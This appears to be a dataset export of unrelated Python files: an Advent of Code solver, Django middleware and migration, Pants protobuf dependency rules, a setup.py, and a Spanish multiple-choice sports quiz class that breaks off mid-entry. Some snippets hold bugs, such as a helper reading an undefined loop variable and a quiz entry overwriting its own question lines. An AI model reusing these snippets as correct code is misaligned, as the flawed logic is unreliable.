text
stringlengths 8
6.05M
|
|---|
file = "./2020/Day08/mattinput.txt"
def has_infinity(history):
h_len = len(history) - 1
for i in range(h_len):
history_compare = history[h_len - i - 1:]
if history_compare[0] == history_compare[len(history_compare) - 1] and len(history_compare) > 1:
if history_compare == history[-(len(history_compare)):]:
return True
return False
def check_operations(operations, nop_jump_max=-1):
i = 0
accumulator = 0
history = []
nop_jump_i = switch_jmp_nop(operations, nop_jump_max)
while True:
history.append(i)
if has_infinity(history):
return True, accumulator
elif i >= len(operations):
return False, accumulator
elif operations[i][0] == 'acc':
accumulator += operations[i][1]
i += 1
elif operations[i][0] == 'jmp':
if i == nop_jump_i:
i += 1
else:
i += operations[i][1]
elif operations[i][0] == 'nop':
if nop_jump_i == i:
i += operations[i][1]
else:
i += 1
def switch_jmp_nop(operations, nop_jump_max):
nop_jump_n = 0
for i in range(len(operations)):
if operation == 'nop' or operation == 'jmp':
if nop_jump_n < nop_jump_max:
nop_jump_n += 1
elif nop_jump_n > nop_jump_max:
return -1
else:
return i
operations = []
with open(file, 'r') as f:
for row in f:
operation, number = row.split(' ')
operations.append([operation, int(number)])
keep_going, accumulator = check_operations(operations)
print(f"#1 {accumulator}")
nop_jump_max = 0
while keep_going:
keep_going, accumulator = check_operations(operations, nop_jump_max)
nop_jump_max += 1
print(f"#2 {accumulator}")
|
from django.utils.deprecation import MiddlewareMixin
class TestMid(MiddlewareMixin):
def process_request(self, request):
print('TESTTESTTESTTESTTESTTEST')
return None
|
#!/usr/bin/python2.7
# -*- coding:utf-8 -*-
'''
HZ偶尔会拿些专业问题来忽悠那些非计算机专业的同学。
今天测试组开完会后,他又发话了:在古老的一维模式识别中,常常需要计算连续子向量的最大和,
当向量全为正数的时候,问题很好解决。
但是,如果向量中包含负数,是否应该包含某个负数,并期望旁边的正数会弥补它呢?
例如:{6,-3,-2,7,-15,1,2,2},连续子向量的最大和为8(从第0个开始,到第3个为止)。
给一个数组,返回它的最大连续子序列的和,你会不会被他忽悠住?(子向量的长度至少是1)
'''
class Solution:
def FindGreatestSumOfSubArray(self, array):
# write code here
length = len(array)
if (length == 0): return 0
max_sum = array[0] # store max sum
tmp_sum = array[0] # store temporary sum
for i in range(1,length):
if (tmp_sum <= 0): tmp_sum = array[i]
else: tmp_sum += array[i]
if (tmp_sum > max_sum): max_sum = tmp_sum
return max_sum
if __name__ == '__main__':
print Solution().FindGreatestSumOfSubArray([-1,-3,6,-3,-2,7,-15,1,2,2])
|
# Copyright 2022 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import annotations
from dataclasses import dataclass
from typing import FrozenSet
from pants.backend.codegen.protobuf.target_types import (
ProtobufDependenciesField,
ProtobufGrpcToggleField,
)
from pants.build_graph.address import Address
from pants.engine.internals.selectors import Get
from pants.engine.rules import collect_rules, rule
from pants.engine.target import FieldSet, InferDependenciesRequest, InferredDependencies
from pants.engine.unions import UnionRule
from pants.jvm.dependency_inference.artifact_mapper import (
AllJvmArtifactTargets,
UnversionedCoordinate,
find_jvm_artifacts_or_raise,
)
from pants.jvm.dependency_inference.artifact_mapper import rules as artifact_mapper_rules
from pants.jvm.subsystems import JvmSubsystem
from pants.jvm.target_types import JvmResolveField
_PROTOBUF_JAVA_RUNTIME_GROUP = "com.google.protobuf"
_PROTOBUF_JAVA_RUNTIME_ARTIFACT = "protobuf-java"
@dataclass(frozen=True)
class ProtobufJavaRuntimeDependencyInferenceFieldSet(FieldSet):
required_fields = (
ProtobufDependenciesField,
JvmResolveField,
ProtobufGrpcToggleField,
)
dependencies: ProtobufDependenciesField
resolve: JvmResolveField
grpc: ProtobufGrpcToggleField
class InferProtobufJavaRuntimeDependencyRequest(InferDependenciesRequest):
infer_from = ProtobufJavaRuntimeDependencyInferenceFieldSet
@dataclass(frozen=True)
class ProtobufJavaRuntimeForResolveRequest:
resolve_name: str
@dataclass(frozen=True)
class ProtobufJavaRuntimeForResolve:
addresses: FrozenSet[Address]
@rule
async def resolve_protobuf_java_runtime_for_resolve(
jvm_artifact_targets: AllJvmArtifactTargets,
jvm: JvmSubsystem,
request: ProtobufJavaRuntimeForResolveRequest,
) -> ProtobufJavaRuntimeForResolve:
addresses = find_jvm_artifacts_or_raise(
required_coordinates=[
UnversionedCoordinate(
group=_PROTOBUF_JAVA_RUNTIME_GROUP,
artifact=_PROTOBUF_JAVA_RUNTIME_ARTIFACT,
)
],
resolve=request.resolve_name,
jvm_artifact_targets=jvm_artifact_targets,
jvm=jvm,
subsystem="the Protobuf Java runtime",
target_type="protobuf_sources",
)
return ProtobufJavaRuntimeForResolve(addresses)
@dataclass(frozen=True)
class ProtobufJavaGrpcRuntimeForResolveRequest:
resolve_name: str
@dataclass(frozen=True)
class ProtobufJavaGrpcRuntimeForResolve:
addresses: FrozenSet[Address]
@rule
async def resolve_protobuf_java_grpc_runtime_for_resolve(
jvm_artifact_targets: AllJvmArtifactTargets,
jvm: JvmSubsystem,
request: ProtobufJavaGrpcRuntimeForResolveRequest,
) -> ProtobufJavaGrpcRuntimeForResolve:
addresses = find_jvm_artifacts_or_raise(
required_coordinates=[
# For non-Android uses:
# TODO: Maybe support Android jars? See https://github.com/grpc/grpc-java#download for
# the differences in required jars.
UnversionedCoordinate(
group="io.grpc",
artifact="grpc-netty-shaded",
),
UnversionedCoordinate(
group="io.grpc",
artifact="grpc-protobuf",
),
UnversionedCoordinate(
group="io.grpc",
artifact="grpc-stub",
),
# TODO: This is only required for JDK 9+ according to https://github.com/grpc/grpc-java#download.
UnversionedCoordinate(
group="org.apache.tomcat",
artifact="annotations-api",
),
],
resolve=request.resolve_name,
jvm_artifact_targets=jvm_artifact_targets,
jvm=jvm,
subsystem="the Protobuf Java gRPC runtime",
target_type="protobuf_sources",
)
return ProtobufJavaGrpcRuntimeForResolve(addresses)
@rule
async def infer_protobuf_java_runtime_dependency(
request: InferProtobufJavaRuntimeDependencyRequest,
jvm: JvmSubsystem,
) -> InferredDependencies:
resolve = request.field_set.resolve.normalized_value(jvm)
protobuf_java_runtime_target_info = await Get(
ProtobufJavaRuntimeForResolve, ProtobufJavaRuntimeForResolveRequest(resolve)
)
addresses: set[Address] = set(protobuf_java_runtime_target_info.addresses)
if request.field_set.grpc.value:
grpc_runtime_info = await Get(
ProtobufJavaGrpcRuntimeForResolve, ProtobufJavaGrpcRuntimeForResolveRequest(resolve)
)
addresses.update(grpc_runtime_info.addresses)
return InferredDependencies(frozenset(addresses))
def rules():
return (
*collect_rules(),
*artifact_mapper_rules(),
UnionRule(InferDependenciesRequest, InferProtobufJavaRuntimeDependencyRequest),
)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#遇到分隔符'|'
f = open('index.txt','w')
r = open('r.txt')
for line in r.readlines():
if not line.strip():
continue
import linecache
print linecache.getline('r.txt',3)
|
import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name = 'DataChaser',
version = '1.0.1',
author = 'SuulCoder',
author_email = 'saulcontreras@acm.org',
description = 'This packages autocompletes the information that is lost in a CSV using AI',
long_description=long_description,
long_description_content_type="text/markdown",
url = 'https://github.com//suulcoder/Chasers-of-the-Lost-Data', # use the URL to the github repo
packages=setuptools.find_packages(),
classifiers = [
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
],
python_requires=">=3.4"
)
|
# Generated by Django 3.1 on 2020-10-16 06:58
from django.conf import settings
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
('announcement', '0002_announcement_to_group'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.AddField(
model_name='announcement',
name='to_people',
field=models.ManyToManyField(blank=True, related_name='to_people', to=settings.AUTH_USER_MODEL, verbose_name='接收人'),
),
]
|
#!/usr/bin/python
# -*- coding: latin-1 -*-
"""
Rigoberto Sáenz Imbacuán
Desarrollador para Dispositivos Móviles - Colombia Games
Ingeniero de Sistemas y Computación - Universidad Nacional de Colombia
http://www.rigobertosaenz.com/
"""
from src.Controller import eActivityId, ResourceController, eQuestionAnswer, \
GlobalsController, eGameDifficulty
class Activity:
def __init__(self, id):
self.id = id
self.description = list()
self.description.append("")
self.description.append("")
self.description.append("")
self.description.append("")
self.description.append("")
self.description.append("")
self.description.append("")
self.description.append("")
self.description.append("")
self.description.append("")
self.description.append("")
self.description.append("")
self.question = list()
self.question.append("")
self.question.append("")
self.question.append("")
self.question.append("")
self.optionA = list()
self.optionA.append("")
self.optionA.append("")
self.optionB = list()
self.optionB.append("")
self.optionB.append("")
self.optionC = list()
self.optionC.append("")
self.optionC.append("")
if id == eActivityId._01_BICICROS:
self.name = "Bicicrós"
self.image = ResourceController.game_Activity01Bicicros
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "El Bicicrós se originó"
self.description[1] = "en California en 1.970,"
self.description[2] = "cuando los jóvenes"
self.description[3] = "intentaban imitar a"
self.description[4] = "los campeones de otro"
self.description[5] = "deporte usando sus"
self.description[6] = "bicicletas."
self.question[0] = "¿Cuál de estos deportes sería?"
self.optionA[0] = "Ciclismo profesional"
self.optionB[0] = "Motocross"
self.optionC[0] = "Ciclismo de montaña"
elif id == eActivityId._02_PATINAJE:
self.name = "Patinaje"
self.image = ResourceController.game_Activity02Patinaje
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "El patinaje puede ser"
self.description[1] = "de dos tipos: El"
self.description[2] = "clásico que se"
self.description[3] = "realiza con patines de"
self.description[4] = "4 ruedas, y el patinaje"
self.description[5] = "en línea que se realiza"
self.description[6] = "con patines que tienen"
self.description[7] = "entre 3 y cinco ruedas"
self.description[8] = "ubicadas en línea recta."
self.question[0] = "¿Cuál de estos crees que es?"
self.optionA[0] = "Skateboard"
self.optionB[0] = "Patinaje"
self.optionC[0] = "Carreras de cuatrimotos"
elif id == eActivityId._03_FUTSAL:
self.name = "Futsal"
self.image = ResourceController.game_Activity03Futsal
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "El fútbol de salón es"
self.description[1] = "un deporte colectivo"
self.description[2] = "de pelota practicado"
self.description[3] = "entre dos equipos de 5"
self.description[4] = "jugadores cada uno,"
self.description[5] = "dentro de una cancha"
self.description[6] = "de suelo duro."
self.question[0] = "¿Con qué otro nombre se"
self.question[1] = "conoce este deporte?"
self.optionA[0] = "Balón mano"
self.optionB[0] = "Microfútbol"
self.optionC[0] = "Bochas"
elif id == eActivityId._04_FUTBOL:
self.name = "Fútbol"
self.image = ResourceController.game_Activity04Futbol
self.answer = eQuestionAnswer.ANSWER_A
self.description[0] = "El fútbol es el deporte"
self.description[1] = "más popular del mundo"
self.description[2] = "que además favorece la"
self.description[3] = "realización de"
self.description[4] = "actividad física."
self.description[5] = "Durante un partido de"
self.description[6] = "fútbol profesional de"
self.description[7] = "90 minutos, un jugador"
self.description[8] = "recorre entre 6 y 11"
self.description[9] = "kilómetros."
self.question[0] = "¿Sabes en cuál país se realizó"
self.question[1] = "el primer mundial de fútbol?"
self.optionA[0] = "Uruguay"
self.optionB[0] = "Brasil"
self.optionC[0] = "Inglaterra"
elif id == eActivityId._05_PORRISMO:
self.name = "Porrismo"
self.image = ResourceController.game_Activity05Porrismo
self.answer = eQuestionAnswer.ANSWER_C
self.description[0] = "El porrismo consiste en"
self.description[1] = "el uso organizado de"
self.description[2] = "música, baile y"
self.description[3] = "gimnasia para hacer que"
self.description[4] = "los aficionados animen"
self.description[5] = "a sus equipos en los"
self.description[6] = "partidos."
self.question[0] = "¿En cuál de estos deportes"
self.question[1] = "no se hace animación con"
self.question[2] = "porras?"
self.optionA[0] = "Fútbol"
self.optionB[0] = "Baloncesto"
self.optionC[0] = "Ajedrez"
elif id == eActivityId._06_ATLETISMO:
self.name = "Atletismo"
self.image = ResourceController.game_Activity06Atletismo
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "Es el arte de superar"
self.description[1] = "el rendimiento de los"
self.description[2] = "adversarios en"
self.description[3] = "velocidad, resistencia,"
self.description[4] = "distancia o altura."
self.description[5] = "Contiene un gran"
self.description[6] = "conjunto de disciplinas"
self.description[7] = "agrupadas en carreras,"
self.description[8] = "saltos, lanzamientos,"
self.description[9] = "pruebas combinadas y"
self.description[10]= "marcha."
self.question[0] = "¿Sabes cuál es la carrera"
self.question[1] = "más corta que pueden correr"
self.question[2] = "los atletas?"
self.optionA[0] = "100 metros"
self.optionB[0] = "60 metros"
self.optionC[0] = "200 metros"
elif id == eActivityId._07_BALONCESTO:
self.name = "Baloncesto"
self.image = ResourceController.game_Activity07Baloncesto
self.answer = eQuestionAnswer.ANSWER_A
self.description[0] = "Es un deporte de equipo,"
self.description[1] = "en el que dos conjuntos"
self.description[2] = "de 5 jugadores cada uno,"
self.description[3] = "intentan anotar puntos,"
self.description[4] = "introduciendo un balón"
self.description[5] = "en un aro colocado a"
self.description[6] = "3,05 metros del suelo."
self.question[0] = "¿Cuánto dura cada uno de"
self.question[1] = "los tiempos de juego?"
self.optionA[0] = "15 minutos"
self.optionB[0] = "10 minutos"
self.optionC[0] = "12 minutos"
elif id == eActivityId._08_KARATE_DO:
self.name = "Karate Do"
self.image = ResourceController.game_Activity08KarateDo
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "El Karate Do no solo trata"
self.description[1] = "sobre el acondicionamiento"
self.description[2] = "físico, el estudio de"
self.description[3] = "los katas y el combate"
self.description[4] = "real o deportivo. "
self.description[5] = "También va de la"
self.description[6] = "mano con el desarrollo "
self.description[7] = "vivencial de la parte "
self.description[8] = "humana y la parte "
self.description[9] = "espiritual, el "
self.description[10] = "crecimiento como"
self.description[11] = "personas y ciudadanos."
self.question[0] = "¿Además del componente deportivo,"
self.question[1] = "qué otro componente tiene el"
self.question[2] = "karate Do?"
self.optionA[0] = "Empresarial"
self.optionB[0] = "Espiritual"
self.optionC[0] = "Individual"
elif id == eActivityId._09_LEVANTAMIENTO_DE_PESAS:
self.name = "Levantamiento de Pesas"
self.image = ResourceController.game_Activity09LevantamientoDePesas
self.answer = eQuestionAnswer.ANSWER_A
self.description[0] = "Es un deporte que "
self.description[1] = "consiste en el "
self.description[2] = "levantamiento de la "
self.description[3] = "mayor cantidad de peso"
self.description[4] = "posible en una barra en"
self.description[5] = "cuyos extremos se fijan"
self.description[6] = "varios discos, los "
self.description[7] = "cuales determinan el "
self.description[8] = "peso final que se "
self.description[9] = "levanta."
self.question[0] = "¿Qué otro nombre recibe el"
self.question[1] = "levantamiento de pesas?"
self.optionA[0] = "Halterofilia"
self.optionB[0] = "Skeleton"
self.optionC[0] = "Biatlón"
elif id == eActivityId._10_TAEKWON_DO:
self.name = "Taekwon Do"
self.image = ResourceController.game_Activity10TaekwonDo
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "El Taekwon Do se destaca"
self.description[1] = "por la variedad y"
self.description[2] = "espectacularidad de sus"
self.description[3] = "técnicas de patada, se"
self.description[4] = "basa fundamentalmente"
self.description[5] = "en artes marciales como el"
self.description[6] = "Kung fu o Wu Shu Chino."
self.question[0] = "¿Cuáles de estos tres son los"
self.question[1] = "colores correctos de algunos"
self.question[2] = "grados básicos del taekwon do?"
self.optionA[0] = "Verde, naranja, negro"
self.optionB[0] = "Verde, azul, negro"
self.optionC[0] = "Verde, amarillo, negro"
elif id == eActivityId._11_BADMINTON:
self.name = "Bádminton"
self.image = ResourceController.game_Activity11Badminton
self.answer = eQuestionAnswer.ANSWER_A
self.description[0] = "A diferencia de otros "
self.description[1] = "deportes de raqueta, en"
self.description[2] = "el bádminton no se juega"
self.description[3] = "con pelota, sino con un"
self.description[4] = "proyectil llamado "
self.description[5] = "volante, plumilla "
self.description[6] = "o gallito."
self.question[0] = "Cada partido de bádminton se"
self.question[1] = "juega a:"
self.optionA[0] = "21 puntos"
self.optionB[0] = "18 puntos"
self.optionC[0] = "25 puntos"
elif id == eActivityId._12_TENIS_DE_MESA:
self.name = "Tenis de Mesa"
self.image = ResourceController.game_Activity12TenisDeMesa
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "El tenis de mesa, es un"
self.description[1] = "deporte de raqueta, que"
self.description[2] = "se disputa entre dos"
self.description[3] = "jugadores o dos parejas"
self.description[4] = "(dobles)"
self.question[0] = "¿Con qué otro nombre se conoce"
self.question[1] = "al tenis de mesa?"
self.optionA[0] = "Golf"
self.optionB[0] = "Ping pong"
self.optionC[0] = "Bádminton"
elif id == eActivityId._13_ESGRIMA:
self.name = "Esgrima"
self.image = ResourceController.game_Activity13Esgrima
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "La esgrima es un deporte"
self.description[1] = "de combate en el que se"
self.description[2] = "enfrentan dos "
self.description[3] = "contrincantes que deben"
self.description[4] = "intentar tocarse con un"
self.description[5] = "arma especial, sin"
self.description[6] = "hacerse ningún daño."
self.question[0] = "¿Cuáles de estos crees que son"
self.question[1] = "los nombres de las armas con"
self.question[2] = "las que se practica la"
self.question[3] = "esgrima?"
self.optionA[0] = "Espada, sable, lanza"
self.optionB[0] = "Espada, sable, florete"
self.optionC[0] = "Espada, sable, bayoneta"
elif id == eActivityId._14_GIMNASIA_ARTISTICA:
self.name = "Gimnasia Artística"
self.image = ResourceController.game_Activity14GimnasiaArtistica
self.answer = eQuestionAnswer.ANSWER_C
self.description[0] = "Las presentaciones en la"
self.description[1] = "gimnasia artística son"
self.description[2] = "generalmente"
self.description[3] = "individuales y tienen"
self.description[4] = "una duración promedio"
self.description[5] = "entre treinta y noventa"
self.description[6] = "segundos, que se"
self.description[7] = "realizan en diferentes"
self.description[8] = "aparatos o en el suelo"
self.description[9] = "usando elementos como"
self.description[10]= "balones o cintas."
self.question[0] = "¿Cuál de estas ideas sobre"
self.question[1] = "la gimnasia es correcta?"
self.optionA[0] = "La gimnasia es muy difícil"
self.optionA[1] = "para los hombres"
self.optionB[0] = "Para practicar gimnasia solo"
self.optionB[1] = "hay que ser flexible"
self.optionC[0] = "La gimnasia puede ser practicada"
self.optionC[1] = "por hombres y por mujeres"
elif id == eActivityId._15_AJEDREZ:
self.name = "Ajedrez"
self.image = ResourceController.game_Activity15Ajedrez
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "El ajedrez es un juego "
self.description[1] = "competitivo entre dos "
self.description[2] = "personas, cada una de "
self.description[3] = "las cuales dispone de"
self.description[4] = "16 piezas móviles que "
self.description[5] = "se colocan sobre un "
self.description[6] = "tablero dividido en "
self.description[7] = "64 partes."
self.question[0] = "¿Cuáles de las siguientes son"
self.question[1] = "piezas del ajedrez?"
self.optionA[0] = "Dama, caballo, lacayo"
self.optionB[0] = "Dama, alfil, caballo"
self.optionC[0] = "Dama, caballo, sainete"
elif id == eActivityId._16_AEROBICOS:
self.name = "Aeróbicos"
self.image = ResourceController.game_Activity16Aerobicos
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "El ejercicio aeróbico "
self.description[1] = "mejora la función "
self.description[2] = "cardiovascular, reduce"
self.description[3] = "grasa corporal, baja los"
self.description[4] = "niveles de colesterol "
self.description[5] = "total en la sangre y"
self.description[6] = "mejora la capacidad "
self.description[7] = "pulmonar, la circulación"
self.description[8] = "en general y el "
self.description[9] = "aprovechamiento del "
self.description[10] = "oxígeno."
self.question[0] = "¿Cuál de los siguientes"
self.question[1] = "beneficios es generado"
self.question[2] = "al prácticar aeróbicos?"
self.optionA[0] = "Mejora la digestión"
self.optionB[0] = "Mejora la capacidad pulmonar"
self.optionC[0] = "Mejora la capacidad de pensar"
elif id == eActivityId._17_NATACION:
self.name = "Natación"
self.image = ResourceController.game_Activity17Natacion
self.answer = eQuestionAnswer.ANSWER_A
self.description[0] = "La natación es el "
self.description[1] = "movimiento y/o "
self.description[2] = "desplazamiento a través"
self.description[3] = "del agua mediante el uso"
self.description[4] = "de los brazos y las"
self.description[5] = "piernas y por lo "
self.description[6] = "general sin utilizar"
self.description[7] = "ningún instrumento "
self.description[8] = "artificial."
self.question[0] = "¿Cuáles de estos son los"
self.question[1] = "estilos de natación?"
self.optionA[0] = "Pecho, mariposa y espalda"
self.optionB[0] = "Mariposa, espalda y relevos"
self.optionC[0] = "Pecho, mariposa y subacuático"
elif id == eActivityId._18_BOXEO:
self.name = "Boxeo"
self.image = ResourceController.game_Activity18Boxeo
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "Es un deporte de combate"
self.description[1] = "en el que dos "
self.description[2] = "contrincantes luchan"
self.description[3] = "utilizando únicamente "
self.description[4] = "sus puños con guantes,"
self.description[5] = "golpeando a su "
self.description[6] = "adversario de la cintura"
self.description[7] = "hacia arriba, dentro de "
self.description[8] = "un cuadrilátero, en "
self.description[9] = "breves secuencias de "
self.description[10] = "lucha."
self.question[0] = "¿Cómo se llaman las secuencias"
self.question[1] = "de lucha en un combate de boxeo?"
self.optionA[0] = "Momentos o tiempos"
self.optionB[0] = "Asaltos o rounds"
self.optionC[0] = "Saltos o esperas"
elif id == eActivityId._19_EQUITACION:
self.name = "Equitación"
self.image = ResourceController.game_Activity19Equitacion
self.answer = eQuestionAnswer.ANSWER_C
self.description[0] = "La equitación es el arte"
self.description[1] = "de mantener el control "
self.description[2] = "preciso sobre un caballo,"
self.description[3] = "así como los diferentes"
self.description[4] = "modos de manejarlo. La "
self.description[5] = "equitación implica "
self.description[6] = "también los "
self.description[7] = "conocimientos para "
self.description[8] = "cuidar caballos y el uso"
self.description[9] = "del equipo apropiado."
self.question[0] = "El equipo para montar a"
self.question[1] = "caballo se llama:"
self.optionA[0] = "Silla"
self.optionB[0] = "Montura"
self.optionC[0] = "Aparejos o arreos"
elif id == eActivityId._20_GOLF:
self.name = "Golf"
self.image = ResourceController.game_Activity20Golf
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "El golf es un deporte de"
self.description[1] = "precisión cuyo objetivo "
self.description[2] = "es introducir una bola "
self.description[3] = "en los hoyos que están "
self.description[4] = "distribuidos en el campo"
self.description[5] = "con el menor número de"
self.description[6] = "golpes."
self.question[0] = "Si vas a practicar golf el"
self.question[1] = "equipo que necesitas es:"
self.optionA[0] = "Pelota y guantes"
self.optionB[0] = "Palos y pelota"
self.optionC[0] = "Pelota y bate"
elif id == eActivityId._21_JUDO:
self.name = "Judo"
self.image = ResourceController.game_Activity21Judo
self.answer = eQuestionAnswer.ANSWER_A
self.description[0] = "El Judo es uno de los "
self.description[1] = "cuatro estilos "
self.description[2] = "principales de lucha"
self.description[3] = "deportiva más "
self.description[4] = "practicados hoy en día "
self.description[5] = "en todo el mundo. Los "
self.description[6] = "practicantes de este "
self.description[7] = "arte son denominados "
self.description[8] = "Judocas."
self.question[0] = "¿Por cuál de esas razones crees"
self.question[1] = "que el judo es un deporte muy"
self.question[2] = "bueno para niños y jóvenes?"
self.optionA[0] = "Incluye ejercicios como"
self.optionA[1] = "saltar, rodar y arrastrarse"
self.optionB[0] = "Es más fácil practicarlo"
self.optionB[1] = "en estas edades"
self.optionC[0] = "Es muy seguro y da"
self.optionC[1] = "buena salud"
elif id == eActivityId._22_RUGBY:
self.name = "Rugby"
self.image = ResourceController.game_Activity22Rugby
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "Es un deporte de equipo"
self.description[1] = "jugado por dos equipos "
self.description[2] = "de 13 jugadores, el "
self.description[3] = "objetivo del juego "
self.description[4] = "consiste en apoyar un"
self.description[5] = "balón ovalado en el "
self.description[6] = "suelo con las manos "
self.description[7] = "sobre o tras la línea"
self.description[8] = "de ensayo."
self.question[0] = "¿Cuál de estas es una"
self.question[0] = "diferencia entre el rugby"
self.question[0] = "y el fútbol americano?"
self.optionA[0] = "En el rugby se mete gol en un arco y en el"
self.optionA[1] = "fútbol americano se hace gol son postes"
self.optionB[0] = "El partido de rugby dura 80 minutos y el"
self.optionB[1] = "de fútbol americano 60 minutos"
self.optionC[0] = "El material de la cancha de rugby es pasto y del"
self.optionC[1] = "fútbol americano es césped artificial"
elif id == eActivityId._23_TENIS:
self.name = "Tenis"
self.image = ResourceController.game_Activity23Tenis
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "El tenis se practica en"
self.description[1] = "un terreno rectangular,"
self.description[2] = "dividido por una red "
self.description[3] = "intermedia. Se disputa"
self.description[4] = "entre dos jugadores "
self.description[5] = "o entre dos parejas"
self.description[6] = "y consiste en golpear"
self.description[7] = "la pelota con la"
self.description[8] = "raqueta para que vaya de"
self.description[9] = "un lado al otro del"
self.description[10] = "campo pasando por"
self.description[11] = "encima de la red."
self.question[0] = "¿Qué forma tiene el terreno"
self.question[1] = "donde se practica tenis?"
self.optionA[0] = "Redonda"
self.optionB[0] = "Rectangular"
self.optionC[0] = "Cuadrada"
elif id == eActivityId._24_VOLEIBOL:
self.name = "Voleibol"
self.image = ResourceController.game_Activity24Voleibol
self.answer = eQuestionAnswer.ANSWER_A
self.description[0] = "Es un deporte donde dos"
self.description[1] = "equipos se enfrentan "
self.description[2] = "separados por una red "
self.description[3] = "central, tratando de "
self.description[4] = "pasar el balón por "
self.description[5] = "encima de la red hacia "
self.description[6] = "el suelo del campo "
self.description[7] = "contrario. Cada equipo"
self.description[8] = "dispone de un número "
self.description[9] = "limitado de toques para"
self.description[10] = "devolver el balón hacia"
self.description[11] = "el campo contrario."
self.question[0] = "¿Qué otro nombre tiene el"
self.question[1] = "voleibol?"
self.optionA[0] = "Balonvolea"
self.optionB[0] = "Volei de playa"
self.optionC[0] = "Mintonette"
elif id == eActivityId._25_HOCKEY:
self.name = "Hockey"
self.image = ResourceController.game_Activity25Hockey
self.answer = eQuestionAnswer.ANSWER_C
self.description[0] = "Es un deporte en el que "
self.description[1] = "dos equipos compiten "
self.description[2] = "para llevar una pelota "
self.description[3] = "de un material duro o un"
self.description[4] = "disco de caucho a la "
self.description[5] = "portería contraria para "
self.description[6] = "anotar un tanto con la "
self.description[7] = "ayuda de un bastón largo"
self.description[8] = "o Palo de Hockey."
self.question[0] = "¿Cuáles de estas son"
self.question[1] = "modalidades del hockey?"
self.optionA[0] = "Césped, hielo y granito"
self.optionB[0] = "Hielo, en línea y"
self.optionB[1] = "superficie lisa"
self.optionC[0] = "Césped, hielo y en línea"
elif id == eActivityId._26_TEATRO:
self.name = "Teatro"
self.image = ResourceController.game_Activity26Teatro
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "El teatro es la rama"
self.description[1] = "del arte relacionada"
self.description[2] = "con la actuación, que"
self.description[3] = "representa historias"
self.description[4] = "frente a una audiencia"
self.description[5] = "usando una combinación"
self.description[6] = "de discurso, gestos,"
self.description[7] = "escenografía, música,"
self.description[8] = "sonido y espectáculo."
self.question[0] = "¿A cuál de estas ramas del"
self.question[1] = "arte pertenece el teatro?"
self.optionA[0] = "Literario"
self.optionB[0] = "Escénico"
self.optionC[0] = "Romano"
elif id == eActivityId._27_MUSICA:
self.name = "Música"
self.image = ResourceController.game_Activity27Musica
self.answer = eQuestionAnswer.ANSWER_A
self.description[0] = "La música, como toda"
self.description[1] = "manifestación artística,"
self.description[2] = "es un producto cultural."
self.description[3] = "El fin de este arte es "
self.description[4] = "suscitar una experiencia"
self.description[5] = "estética en el oyente, y"
self.description[6] = "expresar sentimientos, "
self.description[7] = "circunstancias, "
self.description[8] = "pensamientos o ideas."
self.question[0] = "¿Si quiero aprender música"
self.question[1] = "a dónde debo ir?"
self.optionA[0] = "A la Casa de la Cultura"
self.optionA[1] = "o a una academia"
self.optionB[0] = "Al coliseo o al teatro"
self.optionC[0] = "A la Alcaldía o a la"
self.optionC[1] = "Secretaría de Educación"
elif id == eActivityId._28_DANZA_FOLCLORICA:
self.name = "Danza Folclórica"
self.image = ResourceController.game_Activity28DanzaFolclorica
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "El término Danza "
self.description[1] = "Folclórica se aplica a"
self.description[2] = "determinados bailes que "
self.description[3] = "resultan importantes "
self.description[4] = "para la cultura y la "
self.description[5] = "historia de un país."
self.question[0] = "¿Cuáles de estos son bailes"
self.question[1] = "típicos del folclor de"
self.question[2] = "Colombia?"
self.optionA[0] = "Jazz, flamenco, porro"
self.optionB[0] = "Bambuco, joropo, cumbia"
self.optionC[0] = "Bambuco, porro y contradanza"
elif id == eActivityId._29_BREAK_DANCE:
self.name = "Break Dance"
self.image = ResourceController.game_Activity29BreakDance
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "Esta danza urbana forma"
self.description[1] = "parte de la cultura "
self.description[2] = "HipHop, cuando la "
self.description[3] = "practican hombres estos"
self.description[4] = "se hacen llamar Bboys, "
self.description[5] = "cuando la practican "
self.description[6] = "mujeres se hacen "
self.description[7] = "llamar Bgirls."
self.question[0] = "¿Cómo se hacen llamar los"
self.question[1] = "hombres que practican el"
self.question[2] = "Breakdance?"
self.optionA[0] = "Rockers"
self.optionB[0] = "Bboys"
self.optionC[0] = "Bgirls"
elif id == eActivityId._30_BALLET:
self.name = "Ballet"
self.image = ResourceController.game_Activity30Ballet
self.answer = eQuestionAnswer.ANSWER_A
self.description[0] = "Es una forma concreta"
self.description[1] = "de danza altamente"
self.description[2] = "técnica a la que"
self.description[3] = "también se le llama"
self.description[4] = "danza clásica. Esta"
self.description[5] = "expresión artística"
self.description[6] = "puede incluir: danza,"
self.description[7] = "mímica, y teatro."
self.question[0] = "¿Cuáles de estos implementos"
self.question[1] = "están en la vestimenta propia"
self.question[2] = "del ballet?"
self.optionA[0] = "Mallas, tutú y zapatillas"
self.optionB[0] = "Mallas, tutú y cintas"
self.optionC[0] = "Tutú, zapatillas y"
self.optionC[1] = "pantalones cortos"
elif id == eActivityId._31_HIP_HOP:
self.name = "Hip Hop"
self.image = ResourceController.game_Activity31HipHop
self.answer = eQuestionAnswer.ANSWER_B
self.description[0] = "El hip-hop surgió en "
